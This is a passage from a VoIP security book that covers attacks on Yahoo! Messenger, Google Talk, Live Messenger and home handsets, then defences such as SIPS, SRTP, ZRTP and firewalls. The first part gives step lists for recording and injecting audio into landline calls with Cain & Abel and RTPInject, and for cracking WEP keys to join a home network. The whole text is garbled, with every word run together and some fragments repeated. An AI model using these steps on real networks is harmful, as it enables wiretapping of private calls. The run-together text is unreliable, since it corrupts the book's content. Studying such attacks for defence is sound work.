Yahoo!MessengerisapopularinstantmessagingclientthatalsosupportsVoIPservicesusingSIPandRTP.WhileSIP/RTPcommunicationiswrappedwithTLSduringPC-to-PCcalls,RTP
trafficisnotprotectedbetweenPC-to-landlinecalls.DuringaPC-to-PCcall,Yahoo!MessengerwrapsalotofsessionandmediainformationintoTLS.AcertainamountofRTPjitterleaksthroughduringPC-to-PCcalls,butnovoice(audio)contentisactuallyextracted.Hence,authenticationattacksonPC-to-PCcallsarequitedifficultbecauseYahoo!Messenger'sauthenticationoccursduringtheSingleSign-On(SSO)processwiththeYahoo!portal.Hence,ifauserisloggingontohismail,hispictures,oraVoIPsession,authenticationwillbewrappedviaaTLStunnel.WhileadecentamountofprotectionisheldonPC-to-PCcalls,thesamecannotbesaidforPC-to-PSTNcalls,asdiscussedinthenextsection.
EavesdroppingonYahoo!Messenger
Yahoo!MessengeralsoallowscallstobemadetoregularPSTNlandlinesormobilephones.WhenauserwantstomakeacalltoaPSTNlineviaYahoo!Messenger,authenticationstilltakesplaceviathesoftware(becauseaccesstotheUItoplacelandlineormobilecallsisnotavailableuntiltheuserhassuccessfullyloggedin).Afterauthenticationoccurs,ausermaycallanyPSTNlineinsteadofaPCrunningMessengersoftware.AndunlikethePC-basedcalls,whenausercallsalandline,theRTPprotocolisusedoverthenetwork.SimilartotheattacksdiscussedintheRTPchapter,ananonymousattackercansnifftheconnectionbetweenthepersonusingYahoo!MessengerandhisoutboundPSTNcall.Oncetheusersniffstheinformation,theattackercaneavesdroponthecallorinjectRTPpacketsinthemiddleofthephoneconversation.SeeFigure8-16.
Figure8-16.EavesdroppingoncallsbetweenYahoo!Messengerandlandlinesormobilephones
Theonlycaveathereisthattheattackermusthavesoftwaresupportingthecodecusedduringthecall.Atthetimeofthispublication,Cain&AbelsupportssomeYahoo!MessengerRTPcodecs,butnotallofthem.InordertoeavesdroponacallbetweenaYahoo!MessengerclientandaPSTNline,anattackerwouldcompletethefollowingsteps.Resultsmayvarydependingonthecodecsupport.
1. Repeatsteps1through13from"CallEavesdropping(RTP)"onCallEavesdropping(RTP).
2. Onthebottomrow,selectVoIP.IfVoIPcommunicationhasoccurredonthenetworkusingRTPmediastreams,Cain&AbelwillautomaticallysavetheRTPpackets,reassemblethem,andsavethemto.wavformat.AsshowninFigure8-17,Cain&Abelhascapturedafewphoneconversationsoverthenetworkusingafewsimplesteps.
Figure8-17.CapturedVoIPcommunicationviaRTPpackets
Usingaman-in-the-middleattackandCain&Abel'sdefaultVoIPsniffer,whichcapturesRTPpackets,anattackercaneasilycaptureandrecordcallsbetweenYahoo!MessengerandthePSTNline.ThekeyideatokeepinmindhereisthattheaudiocodecusedduringthecallmustbesupportedbyCain&Abel.Ifthecodecisnotfullysupported,therecordedcallmaycaptureonlyonesideoftheaudio.Cain&Abelwillshowifthecodecisunsupportedbyindicating"IP1/IP2codecnotsupported"intheStatuscolumn.
InjectingAudiointoYahoo!MessengerCalls
SimilartotheRTPinjectionattackdiscussedinChapter4,Yahoo!MessengercallstoPSTNlinescanalsobeinjectedwithaudiofromananonymousattacker.TheinjectionattacksallowmaliciousentitiesonthenetworktoinjectaudiointoexistingcallsbyYahoo!users.Referto"VoiceInjection(RTP)"onVoiceInjection(RTP),whichshowsyouhowtoinjectaudiocontentintoVoIPcallsthatuseRTPformediatransfer.
GoogleTalk
GoogleTalkusesExtensibleMessagingandPresenceProtocol(XMPP)andXMPPExtensionProtocols(XEP)foritsvoiceservices.XMPPisanopenXMLprotocoldevelopedbythe
Jabberopensourcegroup.Google'sXMPPcommunicationusesTCPport5222,withalltrafficencryptedusingTLS.XMPPaloneoffersnoprotectionoftheclient'susernameorpassword,includedwithplainSASL(SimpleAuthenticationandSecurityLayer);however,GoogleTalkforcesauthenticationtotakeplacewithGoogle'sSingleSign-On(SSO)token,asnotedbythe"X-GOOGLE-TOKEN"mechanismshowninFigure8-18.TheSSOisconductedoverSSLbeforetheXMPPcommunicationprocessoccurs,whichprotectstheuser'scredentials.
Figure8-18.XMPPXML,displayingGoogleTalkauthenticationtoken
BecausetheSSOauthenticationprocesstakesplaceoverTLSandXMPPmediaarewrappedoverTLS,encryptionprotectstheusername,password,andmediawhiletheyareintransit.TheuseofTLSforauthenticationandmedia(audio)transferaddssignificantlytothesecurityofGoogleTalk;however,afewSSLattackscanstilltakeplace.Forexample,asignificantattackclassonTLS/SSListoperformaman-in-the-middleattackbetweentheenduserandtheserver.AnattackercanplaceherselfinthemiddleofaclientandaserverbyattackingARP,CAMtables,orDHCPandintercepttheSSLcertificatewhentheSSLhandshakeisattempted.DuringtheSSLhandshake,theattackerwillneedtoenticeausertoacceptherfakeTLScertificate.Becausetheattackerholdsallprivatekeysofherfakecertificate,iftheuseracceptsthefakecertificate,theattackercandecrypttheTLSinformationandviewitscontents.ThebesttoolforperformingSSLman-in-the-middleattacksis
Cain&Abel.However,GoogleTalkpreventsthisattackfromhappeningwithstrongSSLsecurityprotections.IfaGoogleTalkclient,oranyGoogleclientusingitsSSOauthentication,seesafake,unsigned,orself-signedcertificateduringtheSSLhandshake,itautomaticallyfailsanddoesnotallowthehandshaketooccur.Itdoesnotevengivetheuseranoptionforaninsecurehandshake,asshowninFigure8-19.
Figure8-19.FailedSSLman-in-the-middleattack
NotethatthisisnotsomuchanattackonTLS/SSLbutratherasocialengineeringattacktogetausertoacceptafakeTLS/SSLcertificate.Hence,whileXMPPislargelyacleartextprotocol,withGoogle'sSSOrequirementtouseTLSwithGoogleTalkmedia,allpasswordinformationandmedia(audio)areencryptedoverthewire.Atthetimeofthispublication,GooglehasopenlydiscussedsupportforSIPinthefuture.IfSIPissupportedbyGoogleTalkwithouttheuseofSSL,alltheauthenticationattacksdiscussedintheSIPchapterwillalsoapplytoGoogleTalk(ortoanyVoIPclientusingSIP).
MicrosoftLiveMessenger
MicrosoftLiveMessenger,anotherpopularinstantmessagingclient,alsosupportsVoIPservicesusingSIPandRTP.SimilartoYahoo!Messenger,Microsoftwrapsallsessionsetupandmedia(audio)transferonpeer-to-peervoicecallswithTLS.AlthoughtherehasbeenmuchdiscussionaboutMicrosoft'sinsecureVoIPcommunication,atthetimeofthispublication,communicationoccursviaanencryptedTLStunnelonPC-to-PCcalls.SimilartoYahoo!MessengerandGoogleTalk,theauthenticationprocessofLiveMessengerusesMicrosoft's.NETSSOcookieoverTLS.BecauseTLSprotectstheSSOcookieandthemedia(audio)communication,eavesdroppingorinjectingcontentduringPC-to-PCcallsonWindowsLiveMessengerisnotpossibleusingtypicalmethods.IfanSSLman-in-the-middleattackisattempted,asdiscussedpreviously,LiveMessengerwillalsofailbynotallowingafake,unsigned,orself-signedcertificateduringtheSSLhandshake,asshowninFigure8-20.
Figure8-20.FailedSSLman-in-the-middleattackunderLiveMessenger
UnlikeGoogleTalk,MicrosoftLiveMessengerprovidestheabilitytomakecallstoregularPSTNlandlines.ThePSTNcallsareprovidedbyVerizon,allowingMicrosofttousetheVerizonnetworktomakecallsoutsideofPC-basedclients.WhenauserwantstomakeancalltoalandlineviaLiveMessenger,authenticationstilltakesplaceviatheSSOcookie(becauseaccesstotheUItoplacelandlinecallsisnotavailableuntiltheuserhassuccessfullyloggedin).
Skype
Skypeisaclosed,non–standards-basedVoIPclient.UnlikeallotherPC-basedVoIPsoftwaredescribedinthischapter,Skypeusesacompletelyproprietaryformatforsessionsetupandmediatransfer.ThismeansthatSkypedoesnotusetraditionalVoIPprotocols,suchasSIP,H.323,RTP,orXMPP,butratheritsownhome-grownVoIPimplementation.Sinceitsinception,SkypehasprobablybeenthemostpopularPC-basedVoIPclient,withmorethan7millionregisteredusers.Inturn,becauseofitspopularityandclosednature,SkypeisprobablythemostcuriousVoIPclientfromasecurityperspective.WhiletherehavebeenmanydocumentedbufferoverflowsagainstSkype,therehavenotbeenanypublishedreportsofSkypedatacommunicationsbeinginsecure.Nevertheless,withaclosedsystem,thereisalsonowayforsubscriberstoverifywheretheirpacketsmayormaynotbegoingandwhomayhaveaccesstothedecryptedinformation.Thisisoneofthebiggestissuesusershavewiththesoftware.TherehavebeenindependentreportswrittenaboutSkype'sencryptionmethods,whichcanbefoundathttp://www.skype.com/security/files/2005-031%20security%20evaluation.pdf/.InadditiontothepaidwhitepaperbySkype,ateamofresearchershasreleasedawhitepaperonreverseengineeringSkype,whichcanbefoundathttp://www.secdev.org/conf/skype_BHEU06.pdf/.
SOHOPhoneSolutionsTheemerginguseofsoftware-basedVoIPclientshaschangedhowpeoplemaketelephonecalls;however,themajorityofcallsplacedviaSkype,Yahoo!,Microsoft,orGooglearelargelyduetoconvenienceorcost,andtheVoIPsolutionusedisnotthedefaultphonesysteminahousehold.Therearemanyreasonsforthis,includingreliability,callquality,andmobility.Mobilityofsoftware-basedVoIPclientsisanissuebecauseusersneedtobenearorontheircomputerstoplaceaVoIPcall.Nomatterhowcheapthesolution,averagehomeusersdonotwanttospendalltheirtalktimeinthecomputerroom.Recognizingthelimitedmobilityofsoftware-basedVoIPclients,smalloffice/homeoffice(SOHO)manufacturershavebeguntocreatehandsetsthataresimilartoaregularcordlesshomephonesbutwhichoperatethroughasoftware-basedVoIPclientthatconnectstothecomputer.ThissectionbrieflyreviewsthesecurityconcernswhenusingthehybridPC/hardphonesolutions.Thesecurityimplicationsarenodifferentfromthosedescribedpreviouslyifinsecureprotocols,suchasSIPandRTP,areused,buttheattackperspectiveprocessisslightlychanged.ManySOHOmanufacturers,suchasLinksys,Netgear,andD-Link,arecreatingproductsthatintegratehandsetswithYahoo!Messenger,WindowsLiveMessenger,orGoogleTalk.TheseproductsallowuserstoplaceregularPSTNcallsviathehandsetaswellasYahoo!orMicrosoft'svoiceservicesviaVoIP.Forexample,userscansignintotheYahoo!Messengeraccountfromthehandsetitselfandplaceacalltoafavoritecontact.TheimplementationdesignforthesolutionisthesameastheoneshowninFigure8-16onEavesdroppingonYahoo!Messenger.Inorderforthedesigntowork,theSOHOhandsetmustbeconnectedwithaUSBcabletoaPCwithYahoo!Messengerinstalled.ThehandsetconnectstotheYahoo!Messenger
softwareonthePC,whichthenmakestheoutboundcalltoanotherYahoo!Messengeruser,amobilephone,orlandline,allviatheInternet.AuserwhowishestomaketraditionalPSTNcallswithoutYahoo!Messengerbutthroughthelocalphonecompanyshouldplugthebasestationofthehandsetintoatelephonejack.ThesecurityimplicationsoftheSOHOsolutionscanbewideornarrowdependingonthelocationandusage.Forexample,ahomeuserwithYahoo!MessengeronhisPCisexposedtothesameattacksurfaceasauserwiththeSOHOhandset,whichisunauthorizednetworkeavesdroppingonthecurrentnetworkorupstreamontheISP.TheuseofaSOHOhandsetbyauserallowsanattackertostillsniffalltheRTPpacketswhenuserscalllandlinesorcellphones.Thisisalsotrueforthesoftwaresolution.AfewareasofexposuretodiscusswiththehandsetsolutionaretheuseofhomeVoIPsolutionswithinsecurewirelessnetworks.AproblematicsetupisshowninFigure8-21.
Figure8-21.SOHOVoIPNetwork
Figure8-21showsasolutionunderwhichahomeusermaybeconnectedtotheInternetusingawirelessaccesspoint/switch.IfthehomeuserhasnotsecuredherwirelessaccesspointorusesWEP,anattackercanjointhewirelessnetworkandsnifftheuser'scommunication,includingherYahoo!MessengerVoIPcalls.ManyaccesspointssupportWPA,astrongersecuritymethodforhomewirelessdevices,butagreatdealofwirelessaccesspointsstilluseWEP,whichisnotagoodsecurityencryptionmethod.Anexternalattacker,asshowninthebottomofFigure8-21,canperformthefollowingstepstoeavesdroponorinjectcontentintoauser'shomephonecommunication:
1. LocatetheWirelessnetwork.2. IfWEPisenabled,usetoolslikeKismet,Aircrack,andCain
&AbeltoobtaintheWEPkey.3. Onceonthewirelessnetwork,useCain&Abel,asshown
in"VoiceInjection(RTP)"onVoiceInjection(RTP),toeavesdropfromYahoo!MessengertoaPSTNline.
4. Onceonthewirelessnetwork,useRTPInject,asshownin"VoiceInjection(RTP)"onVoiceInjection(RTP),toinjectaudiointoRTPpacketsfromYahoo!MessengertoaPSTNline.
Alternatively,ifnowirelessnetworkisused,externalexposuresarelimitedtoattackingtheISP'snetwork.Forexample,ifanattackerperformedaman-in-the-middleattackonherpubliclyfacingnetworksubnet,allpacketswouldarriveonhermachineinsteadofontheISP'supstreamrouter.IfanyofthesepacketscontainedRTPpackets,theattackercouldeavesdroporinjectasshewishes.Intheexample,performingatargetedattackisharderastwoneighborswiththesameISPcouldbeonentirelydifferentsubnets.BecausemosthomeshavewirelessaccesspointswithorwithoutWEP,attackingthewirelessnetworkisprobablythebestattacksurface.
Itshouldbenotedthatinternalattacksonthewirednetworkswitch/hubwouldwork,regardlessofwhetherYahoo!MessengeronaPCoraLinksysdeviceisbeingused.AninternalattackerwouldneedonlytoconnecttothenetworkswitchshowninFigure8-21anduseCain&AbelorRTPInjecttoperformtheattackshewantstocarryout.Hence,ifahostilefamilymemberorroommatewishestorecordallcallsorinjectcontent,anycallsfromthehandhelddeviceofPCsoftwaretoaPSTNlinearevulnerable.
SummaryAfewhomeVoIPsolutionshaveroomforimprovementwhenitcomestosecurity,whileothersareprettydecent.BecausemanyofthesolutionsuseexistingVoIPprotocols,suchasSIPandRTP,allofthemwillalsoinherittheirsecurityexposures.Forexample,ifRTPisusedwithYahoo!Messenger,Ciscohardphones,orVonage,itssecurityexposureswillaffectallproductsthatuseit.CommercialVoIPsolutions,suchasVonage,havelittlesecuritybuiltintothem.Itemslikeencryptionaretotallyabsent,whichmaybeasurprisetomostcustomers.Furthermore,whilePSTNlandlinesmightbeasvulnerableasVonage,IP/Ethernetisamuchlargerattacksurfacegiventhatanyoneinyourhomeoronyourwirelessnetworkcanlistentocalls.Inaddition,PC-basedVoIPsolutionshavehadsomepositiveandnegativeresults.AllPC-basedsolutionsthatuseSSOforauthenticationareusingSSL,ensuringthattheauthenticationinformationisprotected.Also,theexposureonthePC-basedsolutionswaslimitedtooutboundPSTNcalls,asPC-to-PCcallswerewrappedwithencryption.Finally,SOHOsolutionswerenodifferentfromthePCsolution,exposingcallstolandlinesbutnotcallstoPCs.HomeVoIPsolutionsaredividedbetweenPC-to-PCcallsandPC-to-landline(orPC-to–hardphone)calls.WhenoneismakingPC-to-PC–basedVoIPcalls,SSLcanbeusedtoencryptthecommunication.Whencallsaremadetoalandlineortoahardphone,thingsbecomemoredifficult.PC-to-landlinecallsusedifferentprotocolsthatoftenlackthesecurityprotectionsavailableinPC-to-PCcalls.
PartIII.ASSESSANDSECUREVOIP
Chapter9.SECURINGVOIPSecuringVoIPisanimportanttaskifyouaregoingtoprotectinformation.Whileorganizationsoftenthinkofsecurityintermsoffoldersandfiles,informationspokenovervoicecanbejustasimportant.Forexample,thinkofhowmanytimespeoplegivetheircreditcardnumber,mother'smaidenname,oreventheirsocialsecuritynumberoverthephone.WhatifthecustomerservicerepresentativeontheotherendisusingaVoIPphone?IfthemedialayerusesRTP,anattackercancapturethepacketsandgainaccesstoallthesensitiveinformation.Thelackofsecurityofvoiceconversations,outlinedinthefirsteightchapters,showstheneedforsecureVoIPnetworks.ManyorganizationsliketosaythatVoIPnetworksareonlyusedinternally,sosecurityisnotahugeconcern.Unfortunately,theseorganizationsareessentiallysayingthateveryphonecall,fromtheCEO'stotheintern's,shouldbesharedwitheveryoneinthecompany,bothprofessionalcallsandpersonalcalls.Weallknowthestatementisnottrue,butwhysuchresistancetosecuringVoIP?ThereasonisthatsecuringVoIPinthepropermannerisnoteasyorcheap.Itcanbeacumbersomeprocessthatinvolvesnewhardwareandmoredollars.IfsecuritywerejustacheckboxonVoIPproducts,itwouldbeeverywhere.Vendorsinitiallyhavenotincorporatedeasy,safe,andinteroperablesecurityfeaturesintotheirproducts,andasaresulttheVoIPconsumershavesuffered.ThischapterwillbeginthediscussiononhowtosecureaVoIPnetworkfromthemanyattackscoveredinthisbook.Specifically,thefollowingareaswillbediscussed:
SIPoverSSL/TLS(SIPS)SecureRTP(SRTP)ZRTPandZfoneFirewallsandSessionBorderControllers
SIPoverSSL/TLSSIPoverSSL/TLS(SIPS;specificallySSLv3orTLSv1),whichusesTCPport5061,isamethodforsecuringSIPsessioninformationfromanonymouseavesdroppers.
Note✎
PreviousversionsofSSL,suchasSSLv2,shouldnotbeusedduetoknownweaknessesintheimplementation.
AsdiscussedinChapter2,SIPisacleartextprotocolthatcanbemanipulatedandmonitoredbypassiveattackersonthenetwork.Furthermore,theauthenticationmethodusedbySIPisdigestauthentication,whichisvulnerabletoanofflinedictionaryattack.Anofflinedictionaryattackbyitselfisaconcern;however,combinedwiththefactthatmostSIPUserAgentsusefour-digitcodesforpasswords(usuallythelastfourdigitsofthephone'sextension),thismakesSIPauthenticationveryvulnerabletoattackers.Tohelpmitigatetheauthenticationissue,aswellasmanyotherissueswithSIP,SIPS(SIPoverSSL/TLS)canencryptthesessionprotocolfromaSIPUserAgenttoaSIPProxyserver.Furthermore,theSIPProxyservercanalsouseTLSwiththenexthop,ensuringthateachhopisencryptedend-to-end.UsingTLSwithSIPissimilartousingTLSwithHTTP.Thereisarequiredcertificateexchangeprocessbetweentwoentitiesaswellassessionkeysthatmustbeused.TheprimarydifferencebetweenHTTPandSIPistheuseofabrowserversusahardorsoftphone.BothcliententitiesneedtohavesupportforTLSwithsometypeofembeddedTLSclientandacertificatechainprocess.Thefollowingstepsshowahigh-levelexampleoftheSIPSprocess:
1. TheSIPUserAgentcontactstheSIPProxyserverforaTLSsession.
2. TheSIPProxyserverrespondswithapubliccertificate.3. TheSIPUserAgentvalidatesthepubliccertificatefromthe
Proxyserverusingitsrootchain(similartotherootchainthatInternetbrowserscontain).
4. TheSIPUserAgentandtheSIPProxyserverexchangesessionkeystoencryptanddecryptinformationforthesession.
5. TheSIPProxyservercontactsthenexthop,suchastheremoteSIPProxyserverornextUserAgent,andnegotiatesaTLSsessionwiththatendpoint.SeeFigure9-1.
Figure9-1.High-levelTLScommunicationfromahardphonetoaSIPProxy
NowthatweknowthegeneralmethodforusingTLSonSIP,thenextstepistoimplementTLS.ImplementationisnotquiteasstandardasHTTPis,becausemostpeopleuseonlyafewbrowsersandwebservers.IntheVoIPworld,thereareseveralvendorsofhardandsoftphonesaswellasdifferenttypesofSIPProxyserverssupportingSIPS.Hence,dependingontheimplementationoftheVoIPnetwork,thereareafewwaystoimplementTLSonSIPphones.ThefollowingareURLsforsomepopularplatforms:
OpenSerTLSImplementationSteps,http://confluence.terena.org:8080/display/IPTelCB/3.5.2.+TLS+for+OpenSER+(UA-Proxy)/
CiscoTLSImplementationSteps,http://www.cisco.com/en/US/docs/ios/12_3/vvf_c/cisco_ios_sip_high_availability_application_guide/hachap2.html#wp1136622/AvayaTLSImplementationSteps,http://support.avaya.com/elmodocs2/sip/S6200SesSip.pdf/
SecureRTPSecureRTP(SRTP),asdefinedbyRFC3711,isaprotocolthataddsencryption,confidentiality,andintegritytotheactualvoicepartofVoIPcallsthatuseRTPandRTCP(RealTimeControlProtocol).Aswesawintheprevioussection,wrappingSIPorH.323trafficoverTLSprotectstheauthenticationinformation;however,themoreimportantpartofthecallisprobablytheactualmediastreamthatcontainstheaudio.ASIPinfrastructureusingTLSwithacleartextRTPmediastreamstillallowsattackerstoeavesdroponorinjectaudiointocallsandacquireconfidentialinformation.SRTPworksbyencryptingtheRTPpayloadofapacket.TheRTPheaderinformationisnotencryptedbecausethereceivingendpoints,routers,andswitchesneedtoviewthatinformationinorderforthecommunicationpathtobecompleted.Thus,inordertoensureprotectionoftheheader,SRTPprovidesauthenticationandintegritycheckingfortheRTPheaderinformationwithanHMAC-SHA1function.It'simportanttonotethatSRTPdoesnotsupplyanyadditionalencryptionheaders,makingitlookverysimilartoRTPpacketsonthewire.ThisallowsQoSfeaturestoremainunaffected.ThefollowingsectionsbrieflydescribethesefunctionsofRTP:
SRTPandMediaProtectionwithAESCipherSRTPandAuthenticationandIntegrityProtectionwithHMAC-SHA1SRTPKeyDistributionMethod
SRTPandMediaProtectionwithAESCipher
SRTPutilizestheAdvancedEncryptionStandard(AES)asthecipherforencryption,whichcanbeusedwithtwociphermodes.ThetwociphermodesthatcanbeusedwithAESareSegmentedIntegerCounterMode(SICM),whichisthedefault,andf8mode.Athirdcipher,whichistheNULLcipher,canalso
andf8mode.Athirdcipher,whichistheNULLcipher,canalsobeusedwithAES,butitnevershouldbeimplementedasitwouldprovidenoencryptiontothemediastream.
Note✎
BeforeAESwasstandardwithRTP,Avayacreatedanalternative,whichiscalledAvayaEncryptionAlgorithm.Ingeneral,usingproprietaryencryptionisnotrecommendedforsecurityorinteroperabilityreasons.
SRTPandAuthenticationandIntegrityProtectionwithHMAC-SHA1
InadditiontoAES,whichprovidesencryptiontothepayload,SRTPcanprovidemessageintegritytotheheaderpartofthepacketwithHMAC-SHA1.HMAC(keyed–HashMessageAuthenticationCode)isacryptographichashfunctiontoverifysimultaneouslyboththedataintegrityandtheauthenticityofamessage.HMACsareoftenusedwiththeSHA-1hashfunction,deemedasHMAC-SHA1.Underthistechnique,anHMAC-SHA1hashwillbetaggedontotheendofapackettoprovideintegritybetweentwoVoIPendpoints.TheintegrityadditionwillensurethatVoIPpacketsarenotsusceptibletoreplayattack,whichcanstilloccurevenwithAESencryptionofthemediastream.Figure9-2showsthestructureofanRTPpacketusingSRTPforauthenticationandencryption.
Figure9-2.SRTPpacketexample
ThefollowingstepsprovideanexampleofhowSRTPcanbeusedbetweentwoendpoints.Inthisexample,endpointsSoniaandKusumwishtocommunicateviaSRTPusingencryptionforthepayloadandauthenticationfortheheaderintheRTPpacket.
1. Soniarequeststhesessionkeysfromthemediatingdevice,suchasAsterisk,CiscoCallManager,orAvayaCallCenter/Server.
2. Themediatingdevice,whichhasthemasterkey,openstwosessionseachwithSoniaandKusum.Thetwosessionsareforeachdirectionofthemediastream.
3. Duringthekeynegotiationphase,themasterkeyispassedintheheaderofthesessionsetupprotocol,suchasSIPorH.323.TheactualsessionkeysarethengeneratedusingAESontheclients.Afterreceivingthemasterkey,SoniaandKusumcreatetheirsessionkeysforthecommunication.
4. AfterbothSoniaandKusumhavecreatedthesessionkeys,theSRTPcommunicationcanoccur.
DependingontheimplementationoftheVoIPnetwork,thereareafewwaystoimplementSRTPbetweenVoIPdevices.HerearetheURLsforsomepopularplatforms:
AsteriskSRTPImplementationSteps,http://www.voip-info.org/wiki/view/Asterisk+SRTP/CiscoSRTPImplementationSteps,http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_administration_guide_chapter09186a00803fe693.html#wp1033627/AvayaSRTPImplementationSteps,http://www.avaya.com/master-usa/en-us/resource/assets/applicationnotes/srtp-iptrunk.pdf/libSRTP,anopensourcelibraryforSRTP,
http://srtp.sourceforge.net/srtp.html/
SRTPKeyDistributionMethod
Onemajor"gotcha"forSRTPisifthekeyexchangeprocessoccursovercleartext,whichcanhappenifaVoIPinfrastructureisusingSIPorH.323withoutaTLStunnel.Thus,theSRTPmasterkeycanbecapturedfromcleartextSIPorH.323packets,andanattackercoulddecryptanyencryptedSRTPpacketscapturedoverthewire.IfSRTPisbeingusedforsecuritypurposes,ensurethatTLSisusedwithSIPorH.323;otherwise,thesecuritybenefitofSRTPisreduced.
ZRTPandZfoneZRTP,anextensionofRTP,appliesDiffie-Hellman(DH)keyagreementtoexistingSRTPpacketsbyprovidingkey-managementservicesduringthesetupprocessofaVoIPcallbetweentwoendpoints.Itstaysfarawayfromthesessionlayer,suchasSIPandH.323,andfocusessolelyonSRTP.ZRTPcreatesasharedsecretthatisusedtogeneratekeysandasaltforSRTPsessions.OneofthenicethingsabouttheprotocolisthatitdoesnotrequirepriorsharedsecretsoraPublicKeyInfrastructure(PKI)tobeinplace.ZRTPissimilartoPGP(PrettyGoodPrivacy)asittriestoensurethatman-in-the-middleattacksdonotoccurbetweentwoendpoints.Inordertosolvetheseissues,itusesaShortAuthenticationString(SAS),whichisahashvalueoftheDHkeys.TheSAShashiscommunicatedtobothVoIPendpointsusingZRTP.EachendpointverifiestheSASvaluetoensurethatthehashesmatchandthatnotamperinghastakenplace.ImplementationofZRTPisfoundinZfone,aVoIPclientthatusesZRTPforsecuremediacommunication.Zfonecanbeusedwithanysessionsetupprotocol,suchasSIPorH.323,aslongasRTPisusedforthemedialayer.Furthermore,Zfonecanbeusedwithanyexistingsoftware-basedVoIPclientthatdoesnotusemediaencryption.Inafewcases,ZfonemayalreadybeintegratedwithintheVoIPclient,althoughtheauthorhasnotseenanyintegratedimplementationsyet.InorderforZfonetoencryptVoIPcommunicationusingRTP,itwatchestheprotocolstackonanoperatingsystemandinterceptsallVoIPcommunication.OncetheVoIPcommunicationhasbeenintercepted,ZfoneencryptsitbeforeitproceedsanyfurtherintotheOS.Forexample,ifanon-SRTPornon-ZRTPclientismakingaVoIPcall,Zfonedetectsthatthecallbeganbywatchingthenetworkcommunicationtoandfromthemachine.Ittheninitiatesakeyagreementbetweenthelocalclientandtheremoteclient.Afterthekeyagreementhasbeencompleted,
remoteclient.Afterthekeyagreementhasbeencompleted,ZfonethenencryptsalltheRTPpacketsoverthewirebetweenthesourceandthedestination(Zfonemustbeinstalledonbothsides,thesenderandthedestination).CompletethefollowingexercisetouseZfonebetweentwoVoIPclientsthatdonotnativelysupportmediaencryption.You'llneedthefollowing:X-LiteVoIPsoftphonefromhttp://www.counterpath.com/index.php?menu=Products&smenu=xlite/,Zfonefromhttp://www.zfoneproject.com/,andalocallyadministeredAsteriskserver:
1. LogintotheAsteriskserver.2. ChangedirectoriestotheAsteriskfolderwiththefollowing
command:cd/etc/asterisk.3. Openthesip.conffilein/etc/asteriskandaddthefollowing
itemsattheendofthefile:[Sonia]type=friendusername=Soniahost=dynamicsecret=123voiptestcontext=test[Raina]type=friendusername=Rainahost=dynamicsecret=123voiptestcontext=test
4. Opentheextensions.conffilein/etc/asteriskandaddthefollowingitemsinthe[test]realm:
[test]exten=>100,Dial,(SIP/Sonia)exten=>101,Dial,(SIP/Raina)
5. InstallX-LiteontwoPCs.InordertodirecttheVoIPsoftphonetoyourAsteriskserver,configureX-Liteusingthefollowingsteps:
a. Selectthedownarrowdrop-downbox.b. NavigatetoSIPAccountSettings.c. SelectProperties.d. SelecttheAccounttabandenterthefollowing:
Username:Username(SoniaorRaina)Password:123voiptestDomain:IPaddressofAsteriskServer
e. SelectOKandClose.6. Download(fromhttp://www.zfoneproject.com/),install,and
enableZfoneonbothPCs.7. OnceX-LitehasbeenconfiguredandZfonehasbeen
enabled,useonePCtocalltheotherX-Liteclientatextension100.
8. OnceX-Litehasmadethecall,ZfonewillinterceptthecommunicationandencryptthemediausingZRTP.Ifthecallissecure,ZfonewillshowSecureingreenasshowninFigure9-3.Ifthecallisnotsecure,ZfonewillshowNotSecureinredasshowninFigure9-4.
Figure9-3.ZfoneSecureusagewithX-Litesoftphone
Figure9-4.ZfoneNotSecureusagewithX-Litesoftphone
FirewallsandSessionBorderControllersToputitmildly,firewallsandVoIPnetworksarenotbestfriends.TherelationshipstartedoutbadlywhenVoIPaskedFirewalltoallowallUDPportsgreaterthan1024through,asifitwereanormalrequest.Firewallwasgreatlyoffended,andthetwohavenottalkedmuchsincethen.
TheVoIPandFirewallProblem
WhilerecentchangestoVoIPdeviceshavereducedthenumberofportsneeded,severalVoIPnetworksstillusealotofportsonthenetwork,wheremanyofthemarenotstatic.Forexample,thefollowinglistshowsthepossibleportsthatmaybeusedinaVoIPnetwork:
SIP
TCP/UDP5060TCP/UDP5061
IAX
TCP/UDP4569RTP
UDP1024-65535(audio/video)UDP1024-65535(control)
H.323
TCP/UDP1718(Discovery)TCP/UDP1719(RAS)TCP/UDP1720(H.323setup)TCP/UDP1731(AudioControl)TCP/UDP1024-65536(H.245)
Thelistdoesnotlooktoobadatfirst,butwhendynamicportsareusedwithRTP,thelistbecomesquitelarge.BecausebothSIPandH.323useRTPformediatransfer,bothofthemajorsessionsetupprotocolsareaburdenforfirewalls.BecauseRTPusesadynamicsetofportsbydefault,itlimitsthefirewall'sabilitytopinpointtheexactportorportsthatneedtobeopened.Anotherissue,besidesopeningalotofportsthroughthefirewall,isNetworkAddressTranslation(NAT).NATedendpointstryingtoreachexternalentitiescanhaveproblemsbecauseRTPportsuseUDPwiththerealsourceanddestinationvaluesinsidethepayload.Thislimitstheabilityofastandardfirewalltoseethecorrectendpoint.ThisbehaviorallowsVoIPsessionstobesetupwithSIPorH.323,butRTPhasadifficulttimefindingitsdestination.Figure9-5showsanexampleoftheseissues.
Figure9-5.DynamicRTPportsandfirewalls
TheSolution
PlentyofsolutionshaveaddressedtheissueswithdynamicportsandNAT,includingtheuseofstaticportsforRTPmedia,firewallsthatareVoIP-aware,andtheuseofSessionBorderControllersandgatekeepers.MostVoIPvendorsnowsupporttheuseofstaticmediaportsforcommunication.Forexample,theRTPmediastreambetweentwoentitiescanbelimitedtoaportortwo,drasticallyreducingtheamountofportsopenedinthefirewallforRTPstreams.ThisallowsVoIPendpointstomakeoutboundcallswithSIPorH.323andallowsthemediaportstobeopenedonthefirewall.Whilethereisnoindustrystandardforstaticmediaports,manyorganizationsandvendorschooseastatic
